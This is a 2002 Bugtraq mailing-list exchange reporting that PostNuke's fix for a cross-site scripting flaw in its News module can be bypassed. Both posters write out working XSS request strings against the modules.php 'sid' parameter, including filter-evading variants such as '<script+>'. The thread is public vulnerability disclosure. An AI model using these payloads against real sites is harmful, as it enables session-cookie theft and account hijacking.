[27270] in bugtraq
Re: Postnuke XSS fixed
daemon@ATHENA.MIT.EDU (Sebastian Konstanty Zdrojewski)
Thu Oct 3 15:16:55 2002
Message-ID: <3D9BED5F.5030103@not2you.com>
Date: Thu, 03 Oct 2002 09:10:23 +0200
From: Sebastian Konstanty Zdrojewski <s.zdrojewski@not2you.com>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
I saw the problem has been solved, and the get you proposed below are no
more working. But if you use the following get, the popup appears again:
on the url http://news.postnuke.com/modules.php
the get
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>
Best Regars,
Sebastian
Daniel Woods wrote:
>Humm!
>
>
>
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
> http://news.postnuke.com/modules.php
>
?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
>Using the request...
>
?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
>gives me the DB Error: message
>
>And using the request...
>
?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
>gives me the Alert Popup and DB Error: message... the '+' is treated
as a blank.
>
>Thanks... Dan.
>
>
>
--
Sebastian Konstanty Zdrojewski
IT Analyst
Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy
Phone (+39) 02.68.80.731
E-Mail s.zdrojewski@neticon.it
Website http://www.neticon.it
